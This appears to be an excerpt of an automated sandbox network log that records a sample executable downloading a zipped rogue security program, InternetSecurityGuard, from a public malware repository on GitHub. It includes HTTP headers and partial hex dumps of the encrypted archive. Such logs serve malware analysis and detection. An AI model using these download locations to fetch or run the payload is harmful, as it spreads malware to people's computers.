                                                                                                                                                    2022-09-29 12:59:08 UTC13661INData Raw: 49 a2 24 20 3c e0 ee c6 08 7d 36 23 a2 c6 3b a7 1e f3 6f 12 94 69 b1 82 f8 74 5e fd 66 cb 62 fb 9c d3 33 f8 67 96 a2 c4 b1 c7 d1 8e 32 2e 9f 75 29 b3 40 1f 34 0d 49 00 66 03 94 16 19 45 45 58 0c e0 82 7f b1 4f a1 cd 12 96 90 77 72 18 a3 87 b9 22 bf b2 bb 49 74 93 ff 94 be 8d e3 42 43 1a 55 3c fa da 50 9f dd bc be 3c 0d ea a8 c8 a7 0b 0b c2 49 dc 6e 36 26 2b 14 c2 e7 30 9c d5 e1 ed 3a fc 35 e8 50 27 97 fe fe 95 9a 15 a5 c6 e9 df 52 eb 16 78 db 9f d9 01 57 61 b4 bb 98 c7 20 bc 56 5e ad 44 3e 78 ba b6 0b b1 2b a8 5f 06 10 42 1a 25 05 31 95 a4 05 2d 20 70 bd d1 25 5f 6d 17 7a 9a 78 d7 e3 14 27 bc f2 63 47 7c af f9 be 00 1b fd a9 a8 4d fa db 0e 72 9e a5 0d 54 25 e5 f6 06 75 ea 3c 48 5c 17 8b a1 78 b5 76 ce dd 56 eb 9d 66 42 16 48 fd 0f 6e a5 69 20 52 a8 16 4c
                                                                                                                                                    Data Ascii: I$ <}6#;oit^fb3g2.u)@4IfEEXOwr"ItBCU<P<In6&+0:5P'RxWa V^D>x+_B%1- p%_mzx'cG|MrT%u<H\xvVfBHni RL
                                                                                                                                                    2022-09-29 12:59:08 UTC13677INData Raw: 00 a5 10 12 f5 e1 02 b4 4e 49 91 05 16 6f 6a 76 09 08 af f8 fa 3c e9 cd a2 cc ca ec 93 39 9b 97 f5 c0 29 ea 5d b2 11 0f 70 7f 44 62 19 58 02 88 21 99 90 56 50 71 d2 fa a1 e6 7a a9 d5 4e d2 33 01 e0 00 24 b3 b5 04 72 88 a8 88 7d 3f 0d e7 c7 58 0b f7 53 b2 b5 db 15 5d ee 1d cb b6 de a8 91 ec 5a a5 9d ac 04 b6 9f fa 04 34 f0 b1 59 8d 89 09 5a 28 49 ae 04 07 db b7 4a 86 7e 0d 13 74 e9 1a 66 96 c8 07 08 0d 64 f2 73 fd 5b 2f a1 8c 0c 54 e5 ac b6 62 f8 72 09 52 42 59 75 7c 43 5e 71 93 25 5e d5 83 ea 08 40 db 36 0a 84 e0 39 dc ad 2f bb 54 fd bb 0b 51 2a 1c fe d4 0c da 72 12 0c fa 98 45 3f 6a 2d eb 34 99 19 3b b2 46 6f ba c0 b3 37 08 2d da 24 a7 53 03 0e 63 41 44 0e 55 a9 9a 08 94 61 3e 14 e3 f5 f8 ea 3d 8e 0d be e9 18 dd 67 06 7c 55 64 65 39 41 3e 6c 18 6a 8a 55
                                                                                                                                                    Data Ascii: NIojv<9)]pDbX!VPqzN3$r}?XS]Z4YZ(IJ~tfds[/TbrRBYu|C^q%^@69/TQ*rE?j-4;Fo7-$ScADUa>=g|Ude9A>ljU


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    85192.168.2.349750140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:09 UTC13687OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    86140.82.121.3443192.168.2.349750C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:09 UTC13687INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:09 UTC13688INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    87192.168.2.349751185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:10 UTC13689OUTGET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    88185.199.108.133443192.168.2.349751C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:10 UTC13689INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 2580873
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "9adcf2d9882d51d3dfdb11b5740aa53cd370781402b00f1834dcef303c637853"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: BC88:67BA:7CF8:C44B3:63359353
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:10 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6977-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456350.030237,VS0,VE229
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: c54fc759921badcf68718952bc243446f6ceef95
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:10 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:10 UTC13690INData Raw: 50 4b 03 04 33 00 01 00 63 00 cd bb 2e 40 00 00 00 00 a5 60 27 00 00 40 62 00 24 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 74 65 72 6e 65 74 53 65 63 75 72 69 74 79 47 75 61 72 64 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 5e 98 e3 cd 5d 7c 53 2d 9b 98 4f b5 7f 8f a4 41 23 fe 23 91 07 b9 55 ef 04 a3 c3 25 84 d2 88 da 08 89 21 d4 dd cf bf bb 58 d0 34 08 6d a9 a7 59 c6 4d 94 22 06 41 c5 ca 01 e2 9a 75 f1 bb 6c 2a 35 7a 71 8b a4 f2 1c 7a bd 0c e0 51 5d cf 08 aa 6e f9 ad a0 63 eb 59 bf 47 bb bb 28 99 fe 4f c6 8d 89 10 07 d6 11 a7 18 84 53 93 bd 67 78 cc 28 2c 6e c5 37 04 4d ea 9e a5 9e 0a 8d 6d d9 94 da 64 fa b7 14 f3 0b 0d 0c 69 42 e7 90 1e 53 46 a0 30 30 f1 19 73 eb 36 37 ae 82 27 0c e6 8b 65 b4 56 69 1a fa 91 3f 46 61 08 c2 8c 36 32 8f fd 45 7d 1b
                                                                                                                                                    Data Ascii: PK3c.@`'@b$Endermanch@InternetSecurityGuard.exeAE^]|S-OA##U%!X4mYM"Aul*5zqzQ]ncYG(OSgx(,n7MmdiBSF00s67'eVi?Fa62E}
                                                                                                                                                    2022-09-29 12:59:10 UTC13706INData Raw: 6b 13 0b f5 e1 e2 a8 4b ba bc ce 39 65 27 f3 ce 58 a0 ec 3e 50 bf cc 16 40 5f 21 4b 34 ed da e1 82 c5 d3 1c 0e e3 b3 7e a8 dd 14 99 4e b7 91 71 71 68 40 8e 06 b3 21 cf 6a c8 49 80 64 94 bb 1e a2 01 3d 57 23 a4 40 27 fa 45 0b 84 d9 16 32 d5 35 9c d1 45 e9 2a 51 c3 7e 3d 48 49 13 ca 32 7e c7 5f 76 3a 95 1d 83 f0 c9 0b c0 45 e0 aa 3c 3c d7 62 0e f3 f3 8b c0 99 30 61 a0 59 98 7e 1d dd d5 4f 05 3f 4b 23 a0 3c f5 5c d9 44 b4 4f 08 d8 b5 97 85 f5 91 3d 4b 65 5e 80 85 b8 dd 9c b0 11 b3 be bf d6 b3 a7 26 43 6e c6 a4 8c bd f6 be b1 e2 44 db eb 50 54 69 b2 21 81 1b ae 58 66 f1 98 e8 20 14 d6 6a e3 57 0e 74 3f 5e 09 cc f0 26 66 7f 53 4f 6a 52 80 e2 92 8b 9f 9b b6 9f 76 32 e5 84 f4 d2 7c d4 a2 ef 82 49 39 17 09 93 db 6f 56 6c b3 e8 0e 11 bf 39 48 9e c7 7a 52 c0 ad fe
                                                                                                                                                    Data Ascii: kK9e'X>P@_!K4~Nqqh@!jId=W#@'E25E*Q~=HI2~_v:E<<b0aY~O?K#<\DO=Ke^&CnDPTi!Xf jWt?^&fSOjRv2|I9oVl9HzR
                                                                                                                                                    2022-09-29 12:59:10 UTC13722INData Raw: ce 1d 34 ef f1 54 58 9e 4a 9d 99 3d e0 cf c8 de 56 0d 4f d0 8f ec 29 aa 1f ff 94 79 67 66 29 19 3f ec 55 94 b5 b5 c3 e1 7c 3a 1a 2f c8 71 6e 3d ef 05 74 64 f9 cb 3d e4 7e 40 6b 71 01 3d ea 56 94 bc f7 6b 97 92 d3 99 1a 10 bc b6 7e 3a 8b a4 ee 78 72 35 d2 58 68 f6 66 5e f4 84 55 6a 3a b6 15 66 81 3b 05 d6 ca 50 d5 d4 a2 9c 3d d3 14 55 12 9b 05 bd d9 75 d7 69 76 85 15 b8 61 e3 1d 37 01 da 7d 45 31 07 19 fe 1b 8d f6 52 77 dd ee 74 46 0c 27 40 b1 cd 43 c7 f0 fe 30 ee 93 dc 65 65 60 fe 88 01 99 ea 47 7c dc 75 8f 9c 02 ec ca dd 3f 21 98 5b 13 ff ec 26 2a c3 59 49 0f 4c 32 58 60 a1 15 8c 28 7f a7 ef ae 8a 1f 42 5d 5e a1 9f 76 69 61 f8 2f 17 f4 4c ae be e2 e2 52 9d 9e e7 cf bd 33 45 34 4d dd f5 68 af 80 c4 31 3b c0 72 a6 b7 a7 92 46 91 32 00 cf e5 f8 3c f1 5d df
                                                                                                                                                    Data Ascii: 4TXJ=VO)ygf)?U|:/qn=td=~@kq=Vk~:xr5Xhf^Uj:f;P=Uuiva7}E1RwtF'@C0ee`G|u?![&*YIL2X`(B]^via/LR3E4Mh1;rF2<]
                                                                                                                                                    2022-09-29 12:59:10 UTC13738INData Raw: d3 a8 9e ab 45 b8 1e 7d f6 08 a0 44 5c f7 11 a2 31 27 03 bf 8a 70 5c 22 e3 22 12 ec 45 cd 3c a1 70 86 30 01 72 4c 43 f9 ed ae 60 c0 7f 55 5a bf a4 02 3b 84 a4 01 eb 5f ae 75 1a a7 bb 96 dc 00 b1 19 fc a3 b5 f9 21 8d 1c b6 ef 69 22 cf 57 fa 54 75 69 19 30 2a 7d 69 73 dc 44 e2 91 76 03 e8 59 98 f2 3d 39 ba e5 fa 9b 5f 9c 63 58 e5 f6 ec e4 e7 cd 97 97 84 f0 48 a8 bd 6b 24 cc cf 7d 19 7a ad 28 b5 4c 2d f1 1d 07 ab c9 5b c4 41 f3 45 c1 65 11 7c c6 5b e4 47 82 dc 0f 6b 0e e1 c5 d6 d7 4d 98 c2 2e 8b 75 f2 99 e9 d7 63 76 44 18 c8 48 c9 3d 24 33 c3 bb cc 8f a6 85 3c d6 dc 78 d6 11 f3 8d e1 ba a0 09 49 f5 87 0e 34 5d 14 2c 67 b2 43 7e c9 60 a9 92 d6 89 45 7d 68 f8 53 64 f0 31 ea 68 a8 7a bf 3a 26 3d c3 00 2b 28 7e 06 c7 c4 fa 3c 90 4e 0c 5f 21 aa a9 0c 7a 14 42 2b
                                                                                                                                                    Data Ascii: E}D\1'p\""E<p0rLC`UZ;_u!i"WTui0*}isDvY=9_cXHk$}z(L-[AEe|[GkM.ucvDH=$3<xI4],gC~`E}hSd1hz:&=+(~<N_!zB+
                                                                                                                                                    2022-09-29 12:59:10 UTC13754INData Raw: f2 f7 0c 49 c4 ae ac b8 2d 99 dd 8e f1 da 7b 32 c3 fe 7d bd 12 85 f9 31 47 87 ae fc 2a cf 2e 8b e7 00 02 a6 0f d8 03 fd e9 3c 28 c6 cf 09 5b 9b bb 4f 3f 4b 82 ee cb 1d fe f5 f0 0f 12 89 60 3b 4d 9c 32 1e 94 4d 34 50 95 16 8c 1f 77 1b e0 c1 15 1a c1 bb 66 d8 13 e3 e1 f8 66 40 20 1f 95 5a ec df ac 5a db b2 43 0a bf a9 04 4a f4 57 76 9e 0b b4 7a 5b 50 de 8e fc bc 5c 8a 2e b6 7d df 92 3e be 0a 17 31 9d c0 c6 2b d0 6c 7a 4a 76 50 c1 2e ac ae 95 71 4a 19 86 07 0d 27 4d 6a 72 5d 3f e7 04 9b 20 d8 bf a4 34 7d d5 98 af 03 a5 a2 9c 14 ba 6d 3b 7d 62 01 3c bd f3 be 7c 9f f4 eb 5f 0b ac 5c e6 fc 88 c2 a4 c6 d1 25 75 bf 65 f8 35 6c b2 f4 74 0e 86 55 76 9f a0 ec 48 05 68 e4 45 b2 42 9f e4 e0 73 65 29 2d f8 41 5e 9e c7 63 a9 ae 36 95 51 ff 2b 41 8b 89 4a 42 6f 73 2f d8
                                                                                                                                                    Data Ascii: I-{2}1G*.<([O?K`;M2M4Pwff@ ZZCJWvz[P\.}>1+lzJvP.qJ'Mjr]? 4}m;}b<|_\%ue5ltUvHhEBse)-A^c6Q+AJBos/
                                                                                                                                                    2022-09-29 12:59:10 UTC13770INData Raw: 3a c9 a7 cd 2f 65 9a 4c d1 85 bf 3f 17 99 6c f4 a3 7e 26 ef 39 92 13 41 00 df c0 b4 ec 49 c4 a3 17 2e ed 03 38 31 ed 9a 23 cf 5e d2 a7 41 0a c6 0f 6a 20 50 fd 08 7b 83 c0 59 d2 67 4c b7 35 26 58 82 d2 ba a0 5a a7 2b c1 14 2b 47 b0 96 24 54 43 4e 9f 61 9b 8e b3 50 42 f5 ba ec 3f d9 f1 28 53 d5 11 cc f1 b9 a9 3b c5 b4 01 fb 69 f5 a6 da ae 40 dc 24 a2 06 9f 16 7f 99 95 1f 62 9c b1 29 d6 d8 b5 bf 1c fb 1f 1d 35 0f 76 19 3b 25 20 37 6d f3 84 74 3a ca 9d 4b 97 43 a2 3e 90 e7 24 7b 17 f4 f1 5b 33 a2 67 57 f9 0c 5a 0c 9d e9 cd 02 96 c3 ce 60 ad cd 68 81 da 95 89 b0 c4 17 22 be ff d6 7c 81 e1 ec e2 3a 5c 19 de 4b 2e ef 2b 90 22 17 bb 21 b4 b9 37 18 f0 72 18 f9 e8 0c 3a 2b ed 6b b8 8d 6c d8 aa b6 10 c0 cd 2e b8 3d 36 5a 22 bd 4b 16 1f 2d 24 69 b0 b9 22 94 85 77 b1
                                                                                                                                                    Data Ascii: :/eL?l~&9AI.81#^Aj P{YgL5&XZ++G$TCNaPB?(S;i@$b)5v;% 7mt:KC>${[3gWZ`h"|:\K.+"!7r:+kl.=6Z"K-$i"w
                                                                                                                                                    2022-09-29 12:59:10 UTC13786INData Raw: f3 c7 d3 e8 53 86 13 24 9b d9 96 94 90 06 c9 97 3d ad 9e 01 86 d2 79 a9 d8 7a 42 79 a6 73 6d 99 74 57 bd 41 fd 16 ed fe 4d d7 5d fa 34 69 79 0b ed 80 a7 ba 16 b1 f3 fe a0 88 ee e2 55 14 13 e2 da 13 91 df ea d0 8d 01 2e 8c 03 84 44 5c b9 c4 d2 f5 b1 3d 69 0a f3 d7 05 d7 cb ca 5f f7 9a 65 15 27 25 d9 87 38 62 20 8b 31 10 a1 86 c3 7b 40 db 6f 67 c7 e1 f0 73 7d 4d 8f 56 95 28 75 ad ed dc df 9a ea eb 18 95 d8 ad a3 87 71 37 21 cc 42 01 86 1c 95 7a 56 80 ae 67 b3 75 1f 33 61 9c dd 4e 04 bc bf 4f 75 6e 47 f3 a1 5b 5b e2 94 a1 87 50 64 3f 58 5f 2a 3d 93 03 84 8e 73 c6 4d 25 eb 4a fb b9 3c d8 44 3f 6b a9 0f 37 7a d5 88 c1 da 0d 7c d7 f0 1a 69 78 28 d9 05 52 76 9f ff 4e 29 24 a1 25 ce e2 ac 23 8f bc 1a d5 f3 58 90 96 03 0a 90 6c 94 b1 f0 b0 1a 6f a1 cd a2 b8 7a 19
                                                                                                                                                    Data Ascii: S$=yzBysmtWAM]4iyU.D\=i_e'%8b 1{@ogs}MV(uq7!BzVgu3aNOunG[[Pd?X_*=sM%J<D?k7z|ix(RvN)$%#Xloz
                                                                                                                                                    2022-09-29 12:59:10 UTC13802INData Raw: d5 a7 2e 94 6a 54 aa a1 5d 9a 0f 32 9b 5f 32 c0 bb 3e 86 3f ca 76 5d cf 67 d9 60 9d b8 7f 42 d7 6c 99 24 01 ba d4 bc cf 1d 34 8e 83 88 c1 f0 83 ac 26 99 9e 94 25 e6 2a df d3 f9 e4 f7 c2 9b 21 8f e4 c4 67 0d f2 50 cd 7a 8f 7f 45 9d a4 86 0c b8 2b 8d bc d7 94 97 dc 8c d1 05 da fb 2c a6 34 51 4c 4d aa 96 f5 28 1a b0 57 16 2c a7 75 f5 75 61 e9 40 35 b7 e1 4d ca 16 92 a4 e2 bd aa ff a7 33 a3 63 38 a9 c7 72 8a 5d 02 03 30 90 a0 24 a8 f8 f4 27 18 7c 3d 5b 15 68 bb f2 2c a8 6b 28 0d 05 66 c0 96 ee e3 09 ef 5d ea 78 64 c8 90 bc 92 10 be 87 14 11 d4 51 e4 34 df 58 93 00 77 6f 5e c0 01 3d 45 84 04 be 75 ef 46 e5 bd d5 9b 5f d1 e4 77 70 b7 6e 8f ae 49 38 38 b3 7e 19 3d 37 85 33 78 c1 cf 89 1b 5d d8 14 95 aa 9d 17 20 48 75 b8 c7 1a 7f ef df 02 38 09 d8 b8 e4 04 4a 17
                                                                                                                                                    Data Ascii: .jT]2_2>?v]g`Bl$4&%*!gPzE+,4QLM(W,uua@5M3c8r]0$'|=[h,k(f]xdQ4Xwo^=EuF_wpnI88~=73x] Hu8J
                                                                                                                                                    2022-09-29 12:59:10 UTC13818INData Raw: f9 45 37 25 50 7f 17 fb fd 09 29 db 79 f4 d7 4d b5 7c 08 ce 1f 9e 63 a9 79 da 6c fe 16 36 ab 4c 87 3a 10 48 bd 0b ba 60 5b 91 b7 aa 94 b6 18 84 48 a5 9e ef 3e 30 ed 10 85 eb 22 ea 95 d7 51 aa 0c b6 92 0f 30 75 a3 1a 84 9d a8 9c ee 17 6a 57 9a 20 fc d4 ae be 0c 99 77 0a 1a 84 4e 2d 64 b5 14 a0 e2 19 ef 3a 35 9b 97 0e 89 ec 23 f4 71 8f 76 e8 ab 3c 09 7b 9e 3f 6d 10 70 73 c7 c9 9e b7 26 96 b7 c7 b7 b2 94 e5 47 d5 6b 1c 0c 82 7a 98 4a 8b d4 19 08 65 66 56 fa 73 60 92 5a 1a bd 81 2f 50 dc 67 90 63 e9 7d c9 6d 40 75 bf 7b 3a da d6 b4 18 ae bc ed b8 8d f1 6a 02 68 ce 2d 42 8d 04 7c b4 59 d9 85 35 d5 52 0c 81 13 bd e2 a2 ff a4 06 e9 dd fa 32 2b 8c 83 7b 9a 87 b6 bf ca b5 1b ec 7b 0c 56 72 68 ff 6c 2c 84 3f 05 51 5a 91 96 74 89 12 78 87 c4 c1 93 3b b2 9f 3c 4a a6
                                                                                                                                                    Data Ascii: E7%P)yM|cyl6L:H`[H>0"Q0ujW wN-d:5#qv<{?mps&GkzJefVs`Z/Pgc}m@u{:jh-B|Y5R2+{{Vrhl,?QZtx;<J
                                                                                                                                                    2022-09-29 12:59:10 UTC13834INData Raw: 68 e9 73 d4 bc 1c 4c 4c 84 6b 0e 9d 73 11 ce ba c6 95 43 c8 96 e2 c2 28 4b af 0c 0b 7c 9d 4a ad 6a 1f e3 5d 61 f6 d9 a4 3f d2 82 b5 ab 4a c0 ac e9 3c bb 76 ef 14 d5 b9 96 fe 46 43 e5 42 3e b5 23 75 8b bb 93 e0 23 23 5f 34 d8 ae 66 29 ae b2 07 63 e0 d1 46 3f cf 3f 12 e6 7b f6 d4 77 05 16 4c 4b e4 4a cf 72 bd 64 ea 71 5f c9 2f af d7 63 26 90 3a 90 6c 1f e5 64 d1 c9 0f a7 f7 ba cf ae 05 1c 1b be 17 b6 a3 a7 51 27 2c 31 57 6d a6 51 3f 6a 5d 7d d7 19 ae 32 a4 06 c0 bc 97 83 ee 95 a0 44 a4 43 35 2b 5c 8a 12 27 1d 58 65 79 65 00 21 af 3c a2 81 9a ce b1 61 22 2e e9 a0 5f 4a 65 9b 41 0d 6a d1 5f 82 22 b2 2c c4 15 49 55 28 6e 40 4d 10 6a 62 1c aa 34 a2 ec 8a 87 88 b2 b9 27 0d 2d 09 36 26 4d 73 91 f9 b0 2a b4 de 41 4a 36 68 44 94 a3 4c 2c b3 b5 85 a8 d3 50 7f 83 8d
                                                                                                                                                    Data Ascii: hsLLksC(K|Jj]a?J<vFCB>#u##_4f)cF??{wLKJrdq_/c&:ldQ',1WmQ?j]}2DC5+\'Xeye!<a"._JeAj_",IU(n@Mjb4'-6&Ms*AJ6hDL,P
                                                                                                                                                    2022-09-29 12:59:10 UTC13850INData Raw: 55 2e 23 e5 8d 5b fe 2f ce 48 23 a9 df e3 73 e9 69 62 07 5d 7e dd 75 df 88 1b 6c 31 0f 55 1c b5 62 30 1b 32 c5 0a 42 5d 7e ce b7 7a ca e7 9a 6c 70 57 26 02 6d f7 30 68 43 f0 ed d7 88 18 ca b3 c8 7b ce e9 d7 d9 62 0b 8e 72 be f5 bb c4 50 f1 a0 90 7a 77 20 9a d9 29 7e b6 6f 2d 00 09 d8 7d 36 14 e5 8c 8c 31 92 63 03 b7 b3 74 6e 74 80 f4 81 b9 5b a7 a0 9e 5d bd ad e0 3a a0 8b 55 a8 68 df bb cc b5 1b c5 87 b5 9f 8e ba 77 20 2c 0f ed 9a a5 31 1a 29 28 7e 09 af 2d 1e b7 fa fe 29 d2 ad 0a 89 81 36 84 28 4c d7 f6 fc a3 66 4a 82 8b 2f 0d 51 4c 90 8d 73 c5 00 de a2 66 d3 0f 11 eb 35 ba a8 c0 42 ea 34 f0 c3 69 3f c8 e9 80 8e 31 a9 2d a5 92 9c 7e 81 71 c9 72 86 96 29 e0 f5 ee d0 1f 67 50 02 6c db a3 e4 50 3a 22 d8 4b 3b fc 87 29 b7 cd b0 b2 46 a0 2f 45 b6 d4 6b b4 4a
                                                                                                                                                    Data Ascii: U.#[/H#sib]~ul1Ub02B]~zlpW&m0hC{brPzw )~o-}61ctnt[]:Uhw ,1)(~-)6(LfJ/QLsf5B4i?1-~qr)gPlP:"K;)F/EkJ
                                                                                                                                                    2022-09-29 12:59:10 UTC13866INData Raw: 09 ef ae 11 34 46 78 dd 6f 85 68 0f 01 2a 57 ab bc 0e 61 21 42 1e bd 44 25 bd e6 0b ee 1d 83 e5 d6 ee cb 46 5f 09 61 43 b1 b4 c8 31 d6 ef de 0b f7 a8 7a be 89 78 a1 c2 93 2d 49 6a e0 44 47 67 22 96 28 1e 5c 6c bd 9d 1c ff 7d c8 da 89 51 c5 ee 99 54 58 ca 52 48 16 62 34 db e9 50 ce a3 ab e9 b1 b5 0d be e7 82 fe c4 8f 56 3c 39 0a 71 c0 d8 c4 4b 55 75 5a f7 64 e6 ed ef 53 d1 2e b0 13 0c a3 b4 66 3a 5a c3 d6 e7 57 79 91 89 70 9a 9b 89 f1 e7 81 89 32 68 f4 27 8b 11 68 e1 69 d7 13 9d e9 29 41 ff cf 99 7c 2d b1 2b 9b 4b ef 79 7e a2 8f c0 12 c5 70 be 6c 10 d2 2a 53 44 e0 97 14 5d d1 39 f0 ff 40 38 d7 72 12 cb 05 d1 d1 55 e8 5f 6e 67 d8 08 6b 58 c4 c2 bc 27 9a 28 f2 c1 a8 3d cb 60 db 57 29 3c d2 f4 68 a3 d3 10 f0 f5 d7 cd ef ae 62 86 02 33 6b c0 05 fe 64 0c ad b0
                                                                                                                                                    Data Ascii: 4Fxoh*Wa!BD%F_aC1zx-IjDGg"(\l}QTXRHb4PV<9qKUuZdS.f:ZWyp2h'hi)A|-+Ky~pl*SD]9@8rU_ngkX'(=`W)<hb3kd
                                                                                                                                                    2022-09-29 12:59:10 UTC13882INData Raw: 81 44 4e 1d ea ab cc ef 93 86 d9 a1 a1 9f 57 d8 57 6e 60 ea 05 03 38 7d 8c ba 44 07 0c c6 e1 f8 dd bc ce 37 6e f5 16 6e 78 b7 ec bb 95 41 ad 05 02 54 b9 c7 a8 42 3a 17 5c 2c 2a 98 23 bd 4d 38 65 a3 87 8f 7d cd 59 f0 b8 31 6f 93 17 2c 42 92 58 07 bd 2d 5b 71 de 11 88 55 ca fe 0a 3a 1c d7 8b 47 7c 3c 86 0e 77 79 4d 14 43 c7 79 44 86 0e cd 52 e8 8c ee b7 e6 68 f3 b5 a8 76 64 41 fc 64 e8 1b 22 a5 cf cc f1 20 62 70 63 8d 72 43 db e0 91 a4 e9 35 a3 74 51 48 61 03 2b 46 b3 d3 95 14 62 df 92 7b cb 93 d3 be 99 60 24 c4 6e 2c f8 fe 1e f4 6d 93 a0 72 43 90 11 f4 d2 86 0d 23 a7 d7 e4 d7 e7 03 04 f3 f5 c5 df 41 33 a1 78 dd e5 7c fd 10 13 74 a2 e3 6d 7c 99 4c 6b d8 d2 28 4a c1 7c eb d7 70 e6 72 37 39 47 33 1f bd aa 62 5e 45 5e 49 1b 51 10 17 71 e7 aa 23 c8 5d 87 34 f1
                                                                                                                                                    Data Ascii: DNWWn`8}D7nnxATB:\,*#M8e}Y1o,BX-[qU:G|<wyMCyDRhvdAd" bpcrC5tQHa+Fb{`$n,mrC#A3x|tm|Lk(J|pr79G3b^E^IQq#]4
                                                                                                                                                    2022-09-29 12:59:10 UTC13898INData Raw: 23 28 18 3f 98 ee 16 07 66 c2 e4 b5 0d 67 79 b5 12 98 13 a1 96 71 ca cd 5e 2a 8f 69 3a 42 9d 24 8f 1b 86 79 93 17 cf b6 74 ec 6f 83 f3 39 f2 a2 d3 e5 41 15 78 2a ae 25 b9 ce de 34 97 58 b9 ec 68 ad 0f 74 8a 56 92 56 61 73 64 3f df 37 01 62 be c8 69 16 ff 55 15 2c a6 cd 05 b0 14 dd c5 1e 22 69 62 b2 b8 b0 42 0b 24 9b a3 3c a9 35 5e 69 53 8b 94 cc c0 3b fc 14 33 e9 49 ed 72 92 77 8b 6b 54 c5 35 a4 85 4c 37 79 45 b8 90 4b 6b e4 d8 41 f1 f5 8e 1e d8 f6 b9 cf 50 08 8b e2 f4 4d 13 a9 77 03 1f 93 36 db 38 60 dd f9 3f c0 ac 29 27 95 5f c6 91 13 cc 61 b4 07 53 a7 74 37 bf b3 88 ba 00 72 88 cf a8 50 ed c4 37 80 08 aa 49 04 d0 d3 a5 09 ea 46 f6 79 5b 35 0b da 1a 01 cd f9 cd 1f c6 77 c2 8d 0d 53 fd f5 7e 47 5d 81 8a e5 11 db f3 04 bb 06 71 a6 cd b8 7d a3 3d e8 59 29
                                                                                                                                                    Data Ascii: #(?fgyq^*i:B$yto9Ax*%4XhtVVasd?7biU,"ibB$<5^iS;3IrwkT5L7yEKkAPMw68`?)'_aSt7rP7IFy[5wS~G]q}=Y)
